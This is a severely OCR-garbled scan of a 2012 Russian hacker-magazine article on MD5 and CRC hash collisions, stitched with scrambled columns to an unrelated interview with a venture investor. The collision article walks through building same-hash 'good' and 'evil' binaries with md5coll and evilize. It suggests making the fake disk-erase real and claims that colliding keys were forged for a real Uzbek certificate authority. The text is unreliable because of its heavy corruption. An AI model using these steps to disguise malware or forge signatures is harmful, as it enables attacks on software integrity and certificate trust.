блока данных- х и у- т аких, что примера хэш-функцию
F[x] = х[19[, опреде л енную на множестве це
высокую скорость является возможность легко nо д о гн ать боль ш ое количество сообщений под заранее известную сумму. Так разря д
ность контрольных сумм [тиnичное число-
32 бита ] ниже, чем 128, 160 и 256 бит], что
лых чисел. Ее ОДЗ [из школьного курса математики ты должен знать,
у криnтографических хэш ей [тиnичные числа:
что это такое] состоит из
означает возможность возникновения неnреднамеренных коллизий.
19 элементов [кольца вычетов no мод улю 19],
а область определе н ия стремится к бесконечности. Так как множе
В качестве nримера можно nривести следующий код на С, демон
ство nрообразов заведомо больше множества значений, коллизии
стрир у ющий nолучение трех СRС-коллизий на
100 000
и т ераций:
обязательно существуют. Что это значит? Давай построим коллизию для этой хэш-функции, исnользуя входное значени е
которого равна нулю. Так как функция
19, то д л я
38, хэш- су мма Flxl периодическая с периодом
любого входного значения у значение у+ 1 9 будет иметь ту
ТАБЛИЦАХЭШ-ФУНКЦИЙ,ДЛЯ КОТОРЫХ БЫЛИ НАЙДЕНЫ КОЛЛИЗИИ Д л инн а х эw · э н а ч е ни я
Алгори т м
Одновременная схема
Davies· Meyer ( с ID EAI
128
Ск орость шифров а ни я
( К бай т/с(
22
Davies-Meyer (с DESI
64
Хзш·функция ГОСТ
256
11
HAVAL 13 nрохода(
nеременная
168
#include <stdio.h> #include <unistd.h> #include <stdlib.h> #define INTE RATION 100000 int main () { int count =0; int i,j ; unsigned hash; char с; unsigned* t а Ы е; tа Ы е = calloc(I NTERATION, sizeof ( unsigned )); for (i = 0; i< INTE RATION; i++ ){ hash = 0; for (j=0; 32 > j;j++){ с = 33 + ( char ) (63 .0*r and ()/ (RAND_M AX+1. 0)); ha s h = ( hash * 33 ) + с;
HAVA LI 4npoxoдal
nеременная
118
HAVAL 15 nрохода(
nеременная
95
MD2
128
23
has h = hash + (hash >> 5); for (j=0; i > j ;j ++ ) if (taЫe [j ]
М04
128
236
taЫe [ i]= h ash;
MD5
128
174
N-хэшl12этапов)
128
29
ha sh) count++ ;
free( t aЫe);
printf( "%d values %d collisions \ n" ,INTERATION, cou nt) ; return 0;
N-хэш(15этаnовl
128
24
RIPE-MD
128
182
SHA
160
75
Snerfu 14 nрохода)
128
48
Среди множества существующих хэш-функций принято осо
Snerfu 18 проходовl
128
23
бенно выделять криптаграфически стойкие,- они nрименяются
Таблица хэ ш - ф у нкций , АЛЯ к оторы х были н ай А е н ы колли з ии
в криnтографии. К nримеру, существуют два наиболее часто
ХАКЕР 04/159/2012
020
www.epidemz.net
Оп ас н ый дв о йник
Verity Certificate
IV- начальное
значение буфера , а
L1
и
L2- различные
сооб щ е
ния . Нап р имер , если взять начальн о е з н ачение буфера
Co mmon Na me: C- l.ledia Electronics ln corpora tion А
Status: Rev oked Va lidity (GI,\ ): Aug Class:
З,
2009- A ug 2, 2012
D i g~ a ll
Class ? - Softl'lare Valid ation FreeRe placement i g~ a ll
Country:
и задать входное сообщение
AAlDDABE l ee6363 E 98A1F B19 1326ED65
aipei Т1f
Se rial Number: 046931 Ьf57e bc5947d~c4 ee 7 a 236 e lss uer Digest:
e xSF 62897C ex4BA763 ED
Class ? - 1.\ icrosoft Softl'l are Va lidation v2
State: Tail'l an City! Location :
ех3 В 3 41е4 2
С
D
Organization : C-1.\edia Electron ics lncorporation Organization al U n~ :
е х 12АС 2375
в
2a 4BdOfca cЗca 29d9 a З4f f fSOЗb2c29f
D97AB FF5 72 18 2 е 9 о
1FAE44Be D93 Ee972
BBFe ElC l Ee1C136D 23688992 0458(868
32774244 9DA64De E 68 7 А 779 8 6 8 727 4 6 А
то добавляя число 2л9 к определенному 32-раз р ядному сло в у
в б лочном б у фере, можно получить второе сообщение с т аким же
Проверка подлинности сертификата на VeriSign
хзшем. Есть несколько программ, которые помо г у т т ебе вс е э т о
дело провернуть [обрати вн и мание на ссы л ки в бо к о в ом вын осе ! . в с тречающи хс я в пов с едневн о й жизн и алг о р и тм а:
В п л ан е бе зо п ас ности предшественник
MD5
MD4 . В
MD4
и
MD5 . МЕТОДЫ ПОЛУЧЕНИЯ ПРОФИТА
являет ся бо л ее н адежным, чем е г о
П е р е д тем как начать практич ес к у ю часть , мы должны добить
новый алгоритм р а зра бот чики добавили
тео рию . Дел о в т о м , что так называемые коллизии мы можем
еще оди н раунд- теперь вместо тре х их стал о ч е т ы р е. Также бы л а
доба в лена новая константа , чтобы свести к мин и м у м у влияние
и с п о льзовать в каче с тве ключа / паролядля аутентифика ц ии в р аз
вхо дн о г о сообщен и я. В каждом р а унде на каждом шаге константа
личном ПО и на веб-ресурсах. Это значит, что даже без з н ания п а
все гд а р азная, она сумм и руется с результатом
р о ля , имея на р у ках только лишь его хэш, мь1 можем сгенерировать
Fи
блоком д анных.
И з м е н илась функция G = XZ v [У пot[Z I I [вмест о ХУ v XZ v YZI. Рез уль
правдаподобный па сс еорд с помощью коллизии , причем за вп ол н е
тат каждого шага складыв а е т ся с результатом п редыдущего, из-за
при е млем о е время . Однако на данный момент существуют и п о
это г о пр о и сходит бо л ее быст р о е изменение ре зультата. Изменился
в се м е стно исп о льз у ются лишь несколько видов <<взло м а>> хэ ше й
по ряд ок работы с в хо д ным и словами в раундах
MD4/ 5, т о есть подбора сообще н ия с зада нн ым хэшем . 1. Перебор по заданному сло в арю: н икаких г аран ти й удач но г о
2 и 3. Даже н еболь
ш ее из м е н е ни е в хо дн о г о сооб щ е ни я [ в н а ш ем случае на оди н би т :
ASC II с имв о л «5» с к о д ом О х3516 = 0001101012 заменяе т ся на символ «4» с ко д ом Ох3416 = 00011010021 приводит к полному изменению
резу л ьтата нет, из плюсов м ожно отмети т ьл ишь м а л ое вр е мя ,
зат ра че н ное на перебор.
хз ш а. Такое с в ойство ал г о р итма назы в ается лавинным эффектом.
2. Брутфорс: банальны й перебор случайных или после д овате л ь ны х
В от так выгл я дит приме р 128 - бит н ого [16-байтногоl МD5-хзша:
комбинаций , большим мину с ом которого является з н ачител ьн ое количество затраченного времени и ресурсов к о мпью т е р а.
MD5( "md5" ) =
3. RaiпbowCгack: атака по радужным таблицам яв л яе т ся са м ым
lbc29b36f623ba82aaf6724fd3Ы6718
эффективным мето д о м « взлома >>; плюс заключается в быстром Кстати, ес л и гово р ить ко н кретно о коллизия х в алгоритме
переборе , минусы- в гигантском размере ра д ужн ы х таб лиц
MD5, т о з д есь м ы м ожем п олучит ь о д и н аковые значения функции [FI для
и б ольшом количе с тв е времени, затраченном на их ге н ера ц ию.
р азных сооб щ ен и й и и д ентичного начального б у ф е ра. Так, напри м е р , для извест н ого сооб щ ени я можно построить второе- тако е,
Для полного перебора или пе р ебо р а по словар ю м ож н о и с
ч то о н о б уд е т им е ть т а к ой ж е хэ ш, к ак и исходное. С то ч ки з р ения
пользовать, к при меру, следующие п рогра м м ы : P asswoг d s P гo,
мате матик и это оз н а ч ает сле д ую щ ее: MD 5[ 1V, L11 = MD 5[ 1V, L21, где
MD5B FCPF, J ohп the
STUXNET И
R i ppeг.
• Об алгоритме MD5: bjt ly/awBxKK : • интересная
ПОДДЕЛЬНЫЕ СЕРТИФИКАТЫ
статья о коллизиях
lматчастьl :
Надеюсь , ты не забыл историю с руткитом Stuxпet, когда
на них:). Как бы парадоксально это не было , но существует
троян-драппер прогружал и запускал в системе свои драйверы ,
ряд доказатель с тв , подтверждающих мои слова . Во-первых ,
спокойно обходя всяческие системы предотвр а щения
на одном закрытом форуме, где тусевались разработчики этих
вторжений и антивирусы? Тогда при реверс - инжиниринге
нашумевших руткитов (хотелось бы особо отметить человека под
сэмnлов вь1яснилось , что драйверы руткит а были подписаны
ником огг, статьи которого присутствуют на ряде авторитетных
« настоящими>> се ртификатами крупных производителей
паблик-ресурсов , посвященных ИБ и реверс-инжинирингу :
контроллеров и чипов JМiсгоп и
woodmaп и орепгс е ) , с уществовал топик о возможности кражи
Realtek . Было
много шума ,
все кинулись обвинять эти компании в некомпетентности .
доверенных сертификатов . В нем приводился пример с
Аналогичная история повторилась и с « братом >> Stu x пet
сертификат (с закрытым ключом) которого был сгенерирован
червем
с помощью коллизии. Во-вторых , ес ли с равнить два сертификата
ics,
Duqu . На этот раз
обвинили компанию
C-Media
Electгoп
се ртификаты которой также были якобы украдены. Все
(настоящий и тот, что был сгенерирован для
Duqu,
Duqu) по размеру,
вроде бы верно, но никаки х краж возможно и не было! Я думаю ,
то окажется, что существует хоть и малая , но все же разница
ть1 уже понял, о чем идет речь. Поддельные се ртификаты
в
были сгенерированы при помощи фундаментального б ага
ноодинаковыепоконтрольнойсумме.Историясукраденными
коллизий. Антивирусы, проверяя контрольную сумму файлов,
сертификатами осталась бы практически незамеченной , если бы
не заметили никакого подвоха, а ведь все держалось именно
не работанезависимы х И Б-исследователей .
ХАКЕР
15 байт! Таким
образом , файлы получались разные по размеру,
04 / 159/20 12
bit.ly/byRrOu; • MD5 Collision Generator: bit.ly/zLRSEc;
• Evilize: bjt,ly/zEBLmj; • Rainbow MD5 Crack Ьу Collision Search: bjt.iy/vYRUxl;
• статья Климы
Властимила
«0
МD5 -
коллизиях »:
bit lvivDONuY; • HashCiash Framework: bjЦyl722ob;
•
научные работы
Марка Стивенса о коллизиях:
bjt.ly/ztdoHg .
021
www.epidemz.net
COVERSTORY
n ОТ ТЕОРИИ К ПРАКТИК Е Ну что же ; теперь перейдем к д о лгожданной практике. Среди профессиональных криптааналитиков есть вполне определенная классификация типов устойчивости алгоритмов хэширования , их всего три.
1. CR2-KK -свобо дн ый от коллизий, ус т ойчивый к коллизиям. 2. СR1-КК -универсальный односторонний . З.
СRО -универса льны й.
Также су щ ествуют три вида соответствующих атак для нахождения
колл и зий:
1. CR2-KK - найти коллизии для конкретной функции. 2. CR1-KK - подо брать к заданному зна ч ению пару, образующую коллизию для конкретной функции .
3. СКО - найти коллизию для семейства функций. Оригинальный сертиф и кат
Сегодня я продемонстрирую тебе два первых вида атак на
практике. Для начала nриведу два блока данных в НЕХ !пара коллизий из научной работы китайског о И Б-исследователя Ван
з овать nр им ер
Сяоюняl, их нужно вбить в hех-редакторе и сохранить в виде дв у х
Итак , к ом пилир у ем нашу nрограмму и линкуем ее с объектным
файлов:
файл ом goo dev il.o:
1-й файл
gcc hello-erase.c goodevil.o
hello-erase.c, идущий в комплекте с исходниками.
-о
hello-erase
d131dd02c5eбeec4693d9aeб98aff95c2fcab58712467eab4ee4583eb8fЫf89
55ad340609f4b30283e488832571415ae85125e8f7cdc99fd91dbdf280373c5b
См от рим кон т ро льн ую сумму nодоnытного файла:
d882Зe3156348f5baeбdacd4Збc919cбdd5Зe2b487daeзfde239630бd248cdae
e99f33420f577ee8ce54bб7e8ea80dlec69821bcbбa883939бf9652bбff72a7e
md5sum . / hello-erase
2-й файл
/ home / satsura/ md5 col l /source/ev ilize / hello-erase
23d3e4873e3eaб 1 9c7bddбfa2d0271e7
d131dde2c5eбeec4693d9aeб98aff95c2fcab5e712467eab4ee458Зeb8fЫf89
Р азби в а ем на блоки нашу полученную контрольную сумму, и за
55ad340609f4b30283e4888325f1415ae85125e8f7cdc99fd91dbd7280373c5b d8823e3156348f5baeбdacd4Збc919cбdd5Зe23487daeзfde239630бd248cdae
п ус ка ем н а исполнение генератор МD5- к оллизий:
e99f33420f577ee8ce54 b67080280dle c6982 1b cbбa883939бf965abбff72a7e
./md5coll 0x23d3e487 init.txt
Если сравнить размер и контрольную сумму в MD5 у п о л у ч е н
е хЗеЗеаб 19 exc7bddбfa
ex2d0271e7 > \
ных файлов, то мы не заметим ника кой разницы! Теперь давай Далее запускаем evilize для создания двух различных испол
найдем е щ е несколько коллизий к этим файлам. Программа MD5 Col li sion Geneгatoг о т Патрик а Стэча поможет нам разобраться в атаке CR2-KK. Смело компилируй ее и запускай на исполне
няемых файлов с одинаковым размером и МD5-хэш ем. Смотрим
ние . П ервая коллизия на моем самом слабом компьютере была
бинарники:
на контрольную сумму и размер, а затем запускаем полученные
получена ме не е чем за 15 минут, а вторая- примерно через два с nоловиной часаl Не так уж и плохо , согласись. Теперь nерейдем к реальной атаке , для этого будем исполь
зовать эксnлойт-библиотеку evi lize !снова обрати внимание на ссылки!. П осле компиляции данной библиотеки в текущей дирек тории должны появиться три файла: evilize, md5coll и объектный файл goodevil.o. В качестве п одопытной программы будем исnоль-
./evi lize hello-era se -с init.t xt -g good - е evil du -sh ./evi l ./good & md5sum ./evi l . / good s,ек . /ev i l s,ек ./good . /evi l d8bf 2 1lbбlб24d331fe06c75bdбe 3c89 d8bf211b61624d33 1f eeбc75bdбe3c89 . /good
НЕМНОГО ИСТОРИИ Ганс Доббертин нашел псев
Китайские исследов ате ли Ван
Те же самые Ван Сяоюнь и Юй
доколлизии в MD5, используя
Сяоюнь IWang Xiaoyunl, Фен Дэн
Хунбо опубликовали алго
определенные инициализи
гус IFeng Dengguol, Ла й Сюэцзя
рующие векторы , отличные от стандартны х.
ритм , позволяющий найти две
ILai Xuej ial и Юй Хунбо IYu Hongbol объявили об
различные последовательности в 128 байт,
обнаруженной ими уязвимости в алгоритме, по
которые дают одинаковый МD5-хэш .
зволяющей находить коллизии за крайне малое
время 11 час на кластере IBM
p690I .
ХАКЕР
022
www.epidemz.net
04/159/20 12
О п ас ны й д войн и к
./good Hello, world! ./ evil This progra m is evi l ! !! Erasi ng hard dr i ve . .. 1Gb .. . 2Gb .. . j ust ki dd ing ! Nothing was erased . Как видишь, о дна программа выводит известную всем безо бидную фразу
«Hello, worldl>>,
а вторая якобы стирает данные на
диске. Мы можем переделать наш hello-eгase.c так, чтобы вместо шуточного стирания данных п роизошло реальное, и тогд а будет
Коллизия в действии
не до шуток. Н о все это цветочки по сравнению со следующей атакой, которую я пров е л при своих иссл е дованиях
CR1-KK. образую щ ей коллиз ию для конкретной функции при ген е рации
ВЗЛОМ
CR1 - KK
элек трон но-цифро вых ключей. Изначально было несколько
В качестве <<же ртвы >> для исследований я выбрал цифр ов ые
данных, которые я и и с поль зовал в качестве входны х параме
ключи компании Uпiсоп, являющейся в Узбекистане м оно поли
тров. Оч ень облег чил за дачу тот факт, ч т о па роль для закры
сто м в области ЭЦП [электронно-цифровой подписи! и се рти
т ой Э Ц П у всех сертификатов один и тот же:
фикации. Осн о вы ваясь на труда х Властимила Климы , я написал
фатальн ая ошибка- са мая гр убая из в с треченных мной за весь
програ мм у
опыт работы в облас ти ИБ . И мея на руках только контрольные
CR1-KK-collisio n keyge n для
п о д бора пар ы к зна чению ,
000000.
Это была
суммы файлов и открытые ключи, мне удалось сгенерировать прим ерный ориги нальный закрыт ый ключ для подписи раз
;s/тdS.otl ~
sanjar@OxrOOtwOrm tJlock #l dor1e
lтdS
col! IVO
личного рода документов, ключей и иден т ификаци и пользова
теля в не скольк их СR М -с и с т емах [к п римеру,
E-hujjat о т того же
монополиста!. Пр о деланн ую работу ты сможешь увидеть воо ч ию Ыосk #2 UI1Slgned
сJопе
на соо тв етствую щих скриншотах, в консоли же все это выгляде
lПt rnO [ 32] ~ {
Ox5d4995бl, ОхбЬ45~~2с,
Ox242lf72e, Oxe434lf9r,
ло прим ерно так:
Ох~lбlебс9,
Ох57Ьс9беЬ,
ОхЬе4Ь9054,
Ох893387с0,
C: \ coll_te st > mdSs um * Ыdla3fб3f9784eef e8c237ff2484a78
Ox0633ad55, Оха2Ь23БОБ, Ox;rJ~Ocl9b, Oxd2e27f73, Ox3deb0900 , Oxed7b5505, Ox9105llce, Ох758Ь9212, Охd3БЬс97с,
Охdб0б9еf9,
Oxf742e78~.
Ох82442сбе,
ОхЬбfбd54е,
Oxfd8ec2d3, Охlб2е494б, Oxc93732fe, Ox50293ffa, Oxa8073ced, Ox1Bbfd87e, Ох7е~3Ьбf7,
Oxad5lбa4c,
Ох7dЬба015,
Ох84аlе48б,
*key((faked
col lis i on).
Ьу
key a654bd7eeьseбcf47caebe42b2fЗe575 c5dбaaa286 393 16614e3d95987fcb612 аб54Ьd7ееьsебсf47саеЬе42ЫfЗе575
OxfЫcOf72,
*cer(faked *pfx(faked *ce r. cer
Как видишь, у сертификатов сег.сег и
};
Ьу Ьу
col l i si on).ce r col l i sion). pfx
cer[ faked Ьу coll isioni .cer
одинаковая контрольная сумма.
ur1s1gr1erJ
~ { Ox242lf/2e, Oxe434lf9c,
111t rnl[Л]
Ox5d4995бl, ОхеЬ45аа2с,
1 Ох~lб1Рбс9,
Ох57Ьс9беЬ,
ОхЬе4Ь9054,
Вх89ЗЗВ7с0,
Н а до при з нать , что МD5-х э ши стали неотъемлемой частью на шей жизни. Они вездес у щи. Их используют в качес т ве ал г о р ит
Ox0633ad55, Оха2ЫЗ60б, Oxala0cl9b, Oxd2e2ff73, Ox3deb0900 , Oxed7b5505, OxllOSllce, 0х758Ь9212, Охd3бЬс97с, Oxdб069ef9, Oxf742e78a, Ох82442сбе, Ох3бfбd54е, Oxfd8ec2d3, Охlб2е494б, 0xad5lбa4c, Ох7dЬба015, Oxc93732fe, Ox50293ffa, Ox84al6486, Oxa8073ced, Oxl8Ьfd87e, Oxfea3bбf7, OxfЫcOf72,
мов для хэширования nаралей как в nрограммнам обес п ечен и и, так и на веб-ресурсах. О н и не зависят н и от пл атфо рм ы, ни о т О С, на которых исполняются. Векторы атак также доволь н о ш ироки : от б анкоматов до цифровы х подписей, от авторизации клие н т сер в е р и до целостн ос ти n е р е даваемых по сети файлов. Я вляясь быстрыми и менее крип тос тойкими , 128-битные алгоритмы хэширования принесут е ще н емало бед. Н а сего д ня ш ний д е нь
};
коллизии и псевдоколлизии б ы ли н ай д ены в бол ьш о м р я д е а лг о
san ar@OxrBOtwOrm
ритмов, с р е ди которых
MD2, MD4, MD5, DE S, DE S- IDE A, RIPEMD, HAVAL[- 128, -2561, SHA-1, ГОСТ Р 34 .10-200 1 и так д алее. Со
-/s/mdScoll ~
временем этот список будет только пополняться.
Ге нерируем к олли з ии
I
Чешский исследователь
Эдуарда Диаз по сп е циально
Властимил Клима опубли
разработанной с х еме создал
библиотеку
ковал алгоритм, дающий
два различных архива с двумя
дания двух разных программ
Дидье Стивене использовал
evilize
для соз
возможность на х одить коллизии на обычном
разными программами , но абсолютно ид е н
с одинаковым кодом цифровой сигнатуры
компьютере с любым начальным вектором
тичными МD5-хэшами.
(A,B,C,DI при помощи метода , названного им
(Authenticode digital signature), authenticode используется Microsoft для подnиси свои х
« туннелировани е».
библиотек и исполняемы х файлов .
ХАКЕР
04/159/2012
023
www.epidemz.net
COVERSTORY Наш гость- удив и тельны й человек . Он н ач и н а л сво й путь к а к ин ж енер и разраба т ывал ар хи те к туру к о м пьютер о в дл я
спутн и ков слежен и я . Его команда создала первые р абочие
зовать, и ты за нее бореш ься. Так и за калялея
образ ц ы
Wi-Fi и раньше все х представила пр о грам м н ую реал из ац и ю VPN для Windows. Запу с т и в не ск оль ко
характер, в таких вот сраже ния х-боях .
те х нол о г и ч ес к их комп а н ий, Ал ек сандр Гали цки й осн овал
Моя п ер вая вст реч а с ос н ов а т е ля м и Suп
венчурны й фонд
СОТРУДНИЧЕСТВО С
M i c гosy st em s с остоял а сь в
Pa гt ne гs, кото ры й х оро шо
Alma z Cap ital
SUN 1990 году.
К нам
в страну впервые приехали люди, с кото
из в е с тен н е т оль к о в Р о ссии, но и в Си л иконов о й д о лине.
рыми мы имели право встречаться. Пр ав да , только через совместное предприятие- о ни создавались специально и контролировались,
дабы мы могли общаться, но были ск рыты. Тогда к нам прие зжал Билл Джой и еще один
НАЧАЛО КАРЬЕРЫ
технической мощи была сильно развита. И зто
Мой путь начинался в Советское время. Все
воспитывало в нас такую
мальчишки с периферии мечтали пробивать ся
ния. Поэтом у я рос в этой системе достаточно
через технические направления. Я хотел про
быстро.
биваться через космос. Мне повезло- я попал
...
систему сраже
активный человек- Джон Гей дж. который в то время был их директором по науке . Мы с Би л л о м Д ж ое м од н о г о в о зраст а, и у нас в о время разг о в о ра по шл о н е чт о вр од е
прот иво ст ояния. Я начал излагать какие-то
Помню, шеф вы з в а л меня, и мы долго
на работу к человеку, который был генераль
обсуждали ар х ите кт уру н о в ого компьюте
вещи- они стали удивляться. Ведь их кто-то
ным ко н структором систем спутниковой раз
ра- ка к о н до·л же н ст рои тьс я . Я исходил из
заманил в Советский Союз, дикую в их глазах
программистских начал- мен я не устраивали
страну. В ходе этих дебатов я все время на
существующие системы программирования:
ходил какие-то аргументы. В определенный
окунулся в т яжелые бессонные ночи про
мы не могли легко менять код на ходу. То есть,
момент нашего спора я полез в карман и до
гра м мистов , вкалывающих, чтобы запустить
технически- могли: спутники упра влялись
стал оттуда 22-слойную полиамидную плату,
первый спутник наблюдения с цифровым изо
с Земли, и мы, естественно, кор ректировали
что ввергло их в полный осадок . В то время
бражением. До этого все спутники еще делали
код со станции управления, соф т помогал
в Америке их делали где-то в
с отстреливающимися кассетами на фотоаппа
исправлять много доп у щенных аппаратных
она не получалась,- а тут целых
ведки и наблюдения.
Из фривольной научной работы я сразу
8 слоев, и у них 22 слояl
ратах. Мы делали первый спутник с системой
ошибок . Но все это требовало очень больших
запоминания и передачей данных через гео
усилий, титанически х бессонных ночей. И, ко
стационарные спутники. Я оказался в команде.
нечно, мы все время пытались зто совершен
и космической аппаратуры . Была придумана
когда все железо уже сделали, а софт, как это
ствовать. Когда началась разработка новой
схема: чтобы решать проблемы габаритов,
часто тогда бывало, не работал.
архитектуры, со с тороны софта уже пошел
мы делали бескорпусную аппаратуру . То есть,
перелом-мы влияли на аппаратуру, и нас
корпуса снимались, и только чипы ставились
Мой шеф - Геннади й Яковлевич Гусь
Наша компания тогда отличалась тем , что мы сидели на стыке микроэлектроники
ков- был настоящим предпринимателем.
стали больше с лушать . По сути дела, началась
на плату. Тогда весь мир начал смотреть в эту
Он обладал теми качествами, которыми от
конкуренция за создание новой архитектуры.
сторону, и позже даже Suп выпустил некий
личались, например, Стив Джобс или Королев. В нем было много авантюризма, техническое
Мой бо с с ска з ал , что е с ли я хочу с делать свою арх ит ектуру , у м еня е ст ь две недели
компьютер, где SРАRС-процессор был именно бес корпусный. Естественно , э то п роизвело на Suп какое
видение и тонна идей . Н апример, очень пока
на формиров а н и е подраз д е л ения . До зто го
затель н ый момент: в Россию п риезжал Н иксо н
у меня, конечно, была куча софтовых инжене
то н евероятное впечатление. Была осень
и встречался с Брежневым. Он привез с собой
ров, но тут- пожалуйста: бери разработчиков
года, когда они приехали к нам в Зеленоград насуперзакрытое предприятие. Там мы снова
1990
несколько чемоданов, развернул их, достал
чипов , бери разработчиков, которые будут
оттуда телефон и начал связываться со своими
платы разводить и воплощать архитектуру
много говорили, показали им еще что-то
посольствами в разных странах. Это, конечно,
в <<же лезо>> . Соответ ствен но , можно было по
У них загорелись глаза, появились мечты-
высить ставки сотрудников в среднем на
у
произвело дикое впечатление. Был
1972
годl
10%-
Sun
..
вообще амбиций мно г о. Мол, как насчет
И Брежнев, естественно , заявил, что к поездке
это был достаточный бюджет, чтобы я мог их
закинуть
в Америку он хочет иметь т акую же систему.
переманить. Нельзя ведь нанять толпу народа
nонты-
SPARC в космос? Для них же зто SPARC в космосе, это же крутоl lntel космосе, и SPARC т оже в космосе. А Билл
Все ответили, что зто невозможно, и только
с улицы: они не прошли бы проверку по спе ц
в
мой босс сказал: «Я это с д елаю». И сделал.
службам, а нужно было много люд ей. И вот я
Джой, как и все: в джинсах, в кроссовках.
К отъезду Брежнева в Ш таты все было обеспе
начал ходить внутри и сманивать специали
Ходи т, танцует, выпендривается. Ш еф говорит
чено: специальный десант высадился на Кубе
стов на новую перспективную работу, тем са
мне: « Что за ненормальный такой?>>
для развертывания систем резервирова н ия
мым наживая себе кучу врагов: меня обзывали
и управления спутником ... Н о, тем не ме н ее,
«Карьеристом», негодяем , человеком , идущим
Брежнев смог достать свой чемодан, снят ь
по трупам ... В общем, я выслушал о себе
космический конгресс. С зтим связано немало
трубку и продемонстрирова т ь, что «МЫ ничем
кучунелестных вещей. Тем не менее , в таких
смешных историй. Наnример, мы вывезли
не хуже, чем они>> .
обстоятельствах понимаешь- у тебя есть две
туда очень много разного железа, включая
недели, тебе нужно сформировать подразде
наш ядерный двигатель для космоса, луноход,
ление . У т ебя есть светлая идея что-то реал и-
нашу ранцевую аппаратуру связи с плоскими
Просто бешеное количество денег и сил тратилось тогда на все эти разработки . Воз
В
1991
:1.
году мы впервые пое х али в США,
где проходил первый Советеко-американский
можно, это б ы ло н е со в сем п ра в и л ь н о с т о ч ки зре н ия экономики и про ч его, но, тем не менее,
эта часть достижений и доказательств нашей
ХАКЕР
021,
www.epidemz.net
04/159/2012
Интервью с венчурным инвестором
ИНТЕРВЬЮ С ВЕНЧУРНЫМ ИНВЕСТОРОМ
АЛЕКСАНдр ГАЛИЦКИИ
ФАКТЫ КанАиАат технических наук б
Изобретательно ла
Аательболее
зо патентов
Основатель ряАа успешаннь~ ~ технологических комn
СоЗАатель в енчур
н ого фонАад\mаz
ортфель кoтo
Capital Partners, в ;и и как 1\нАекс , poro такие комnа дlterGeo Paralle\s, д\awar,
Увлекается горными лыжами и винАсерфингом
Чл е н Совета (<Сколкаво>>
ХАКЕР
025
04/159/2012
www.epidemz.net
COVERSTORY развит как сейчас. Ты не можешь пригото вить что-то вкусное, если не был на кухне: ты должен видеть, что делает повар. Я тогда В
антеннами, которую использовали наши служ
1993
году мь1 впервые продемонстр и ро
вали работу РСМСIА-карточек
Потому что по какому-то там закону- ввозить
щих на скорости 4 М бит/с. Это было на выстав
для них человек, поэтому меня таскали на
можно, а в. ывозить нельзя.
ке lпterop в Париже.
разные совещения [наверное, с мыслью, что
Тогда Sun 'овцы nригласили меня nриехать
Wi-Fi
Wi-Fi, работаю
проводил много времени в Кремниевой
бы. И это все запретили вывозить обратно:).
долине и был такой абсолютно уникальный
я скажу что-нибудь умное). И Скотт Макнили,
в то время был нафиг никому н е
к ним в Калифорнию. В то время нас обхажи
нужен ! Ни в России, ни на Западе . Для
вали все
это было непрофильное направление, поэтому
Шмидт. Когда я был в фирме, они все время
вместе с ними мы nоехали к
демократично приходили на обед со всеми
-IBM,
НР... Но все они были такие
очень формальные: в галстуках , костюмах,
и Энди Бэчтольшайм, и Билл Джой, и Эрик
Sun
Ericsson, самой
сотрудниками, но садились за отдельный стол
вели сложные разговоры. И помню, я приле
революционной компании в данной сфере на
тел в Suп, встретился там со своим нынешним
тот момент.
партнером Джеффом Байером. Он сидел такой
со своимрадиомодемом-первый <<носиль
в джинсах, в каких-то тапочках на б осу ногу,
ный>> компьютер, раскладушечка такая. Ее все
все так расслабленно ... И я подумал: <<Вот,
начали усиленно по купать . Было видно- чело
этих бесед, я выносил сведения о каких-то ды
это правильные пацаны, с которыми надо
век машин у останавливает, антенну открывает,
рах, которые тогда существовали. Одна из дыр,
работать! Что там какие-то
бах-бах-бах, и почту получил. Скорости
которую я подметил,- это реализация
IBM
и НР» . Так и за
активно продавала Н Р
LX
19.2
кбит/с было более чем достаточно . Приложений
вязалась дружба. В один момент
Sun
прислала нам
компьютеров , стоимостью каждый
000 долларов .
Ericsson
15 no 25
Ну что с ними делать? Надо
и туда приглашали людей, с которыми хотели беседовать. Меня звали всегда.
Я nрос то слушал чужие беседы . Исходя из
VPN,
который нужен был для интернета, потому как
к nисьмам тогда не было- почта была чисто
не было защищенных каналов. Тогда я осо
текстовая. Поэтому нам ответили: «Куда нам
знал, что
такие скорости? Нет рыночной nотребности>>.
и сказал: << Все, парни, делаем все в
« Какие же мы были тогда чудаки! », - го
работать. Я пошел сдавать их на госкомпанию.
Но гасслужба по советскому закону не могла
ворил мне СЕО
взять от частного лица подарок на такую
с ним в
Sun
сумму, а таможня тогда с частных лиц денег
Ericsson, 2003-2004 году.
когда мы встречались
Sun
нифига не понимает в
Windows Windows!».
И мы взломали эти NОIS-драйверы, которые
Microsoft
не публиковала. Выполнили реверс
инжиниринг, на который американцы либо
нас использовала чи сто для своих
неспособны, либо не делали его по этиче
не брала. И один мой товарищ сказал: <<Что
нужд . Им было интересно кидать нам какие-то
ским соображениям, и разработали
ты мучаешься, ну не берут их у тебя- открой
нерешаемые задачи, и мы пытались их решить.
появился Suп Sсгееп Е+ и позже- российская
компанию>> . А открыть компанию занимало два
В
<< Застава>>.
дня ... Мы пошли и открыли. Так и образовалась
модули. Было очень мног о nроектов в сотруд
мы выгребали баги, к нему же писали
ничестве с Эриком Шмидтом, который тогда
моя первая компания.
О СО ЗДАНИИ
Solaris
WI - FI
Так
VPN.
СОЗДАНИЕ ВЕНЧУРНОГО ФОНДА
был президентом софтового подразделения,
Я начал вкладывать в интересные проекты
а затем СТО компании. Я подбирал заказы,
свои личные деньги. Но потом решил- нет,
К концу 80-х мы начали вести испытания IР
смотрел, что там неправильно, мы лепили про
что-то неправильно, нужно что-то менять,
протокола через наши системы передачи дан
дукты и продавали их за большие деньги.
нужно решать это более комплексно. Нужно сделать фонд, который будет решать эту про
ньlх. Я был апологетом Uniх-систем и считал, что IР-протокол позволяет нам делать очень
О ПР ЕДПРИНИМАТЕЛЬСТВЕ
много независимых вещей. Это, в отличие от
Вся история 90-х строится н а том, что мы
блему в более масштабном виде. Так я начал двигаться к своему фонду.
РОР'шных или ОЕС'овских, открытые про
были воспитаны на инженерной науке , на
токолы, соответственно, с их помощью можно
создании этих, в каком-то смысле единичных,
интересны х компани й, у которых нет знаний ,
Меня начало увлекать , что есть много
много чего организовать в сетях. Нам нужно
образцов, чтобы удивить мир. Ч тобы показать,
а я мог бы с ними поделиться, потом вложить
было передавать для «звездных войн>> целую
что <<мы не хуже>>. Коммерческая составляю
куда-то деньги.
кучу потоковой информации, сливать с разных
щая ни у кого не сидела в голове- было жела
маленьких спутников. Это можно было делать
ние сделать и удивить.
единственно таким вот образом. Новорожден Мы к этому времени уже начали сотрудни чать с
Sun. И
вот они присылают нам спец
